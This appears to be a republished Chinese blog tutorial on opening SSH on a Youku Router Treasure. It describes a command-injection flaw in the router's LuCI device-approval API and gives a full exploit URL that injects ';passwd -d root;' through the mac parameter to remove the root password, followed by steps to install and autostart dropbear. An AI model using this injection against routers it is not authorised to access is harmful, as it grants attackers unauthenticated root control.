优酷路由宝无线服务器,优酷路由宝开启SSH

路由宝到手后,连TTL,启动信息说明系统用的是openwrt,但一进内核,TTL就不在输出。还关闭了SSH和Telnet。就让软件工程师用软件的方式来搞定它!摸索的过程很漫长,本文将直接总结开启SSH的步骤

固件解包后获得信息:

系统用openwrt,sshd或者dropbear 已被优酷直接删除,telnet还在。

opkg的地址被指向本地IP。

系统是openwrt,用的LUCI,那就有机会注入脚本。

果然

88223dbdd243abda0f9ec520ab574f02.gif

漏洞.PNG (90.37 KB, 下载次数: 650)

2015-3-14 20:21 上传

允许设备联网这个接口,没有对MAC这个参数做过滤,可以构造命令,做任何想做的事情。

telnet连不上,是因为openwrt只会在root账户没有密码的情况下才允许telnet连接。

所以,构造请求 ;passwd -d root;

http://192.168.11.1/cgi-bin/luci/;stok=6162fd66813c8381229b2fe99993d61e/api/devices/allowConnect?mac=%3Bpasswd%20-d%20root%3B

删除 root密码

telnet 连接 成功

88223dbdd243abda0f9ec520ab574f02.gif

telnet.PNG (52.12 KB, 下载次数: 681)

2015-3-14 20:22 上传

修改opkg.conf,更换openwrt源

88223dbdd243abda0f9ec520ab574f02.gif

opkgconf.PNG (54.71 KB, 下载次数: 686)

2015-3-14 20:22 上传

更新opkg  opkg update

安装dropbear opkg install dropbear

设置 dropbear 自启动 修改 /etc/rc.local 添加一行 /usr/sbin/dropbear

本来可以执行 /etc/init.d/dropbear rc.common但报错了,不管了,有空再看,先粗暴的直接执行命令。

88223dbdd243abda0f9ec520ab574f02.gif

自启动.PNG (50.54 KB, 下载次数: 677)

2015-3-14 20:22 上传

查看一下 iptables,确认22 端口开放;

重启,发现ssh可以连了。

那就再telnet上去,设置root密码。

88223dbdd243abda0f9ec520ab574f02.gif

修改密码.PNG (60.07 KB, 下载次数: 688)

2015-3-14 20:21 上传

SSH连接成功

88223dbdd243abda0f9ec520ab574f02.gif

ssh成功.PNG (58.74 KB, 下载次数: 653)

2015-3-14 20:22 上传

搞定收工。

改日再折腾 TTL 输出

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值